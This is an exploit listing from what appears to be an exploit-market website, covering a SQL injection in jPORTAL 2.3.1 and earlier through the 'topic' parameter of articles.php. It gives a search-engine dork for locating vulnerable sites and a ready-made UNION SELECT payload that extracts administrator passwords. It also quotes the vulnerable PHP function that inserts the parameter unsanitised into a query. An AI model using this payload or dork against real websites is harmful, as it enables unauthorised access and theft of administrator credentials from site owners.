[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability

Author
Alexsize
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2276
Category
web applications
Date add
09-11-2007
Platform
unsorted
================================================================
jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability
================================================================



Title:jPORTAL =< 2.3.1 and  Remote SQL Injection Vulnerability
Dork:  intext:"jPORTAL 2" & inurl:"articles.php?topic="

Autor:  Alexsize


articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

Vuln code:

function topic_name($a)  
{     
global $topic_tbl; 
$query = "SELECT * FROM $topic_tbl WHERE id=$a"; 
$result = mysql_query($query);   
$r = mysql_fetch_array($result);     
return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';   
} 




#  0day.today [2024-11-15]  #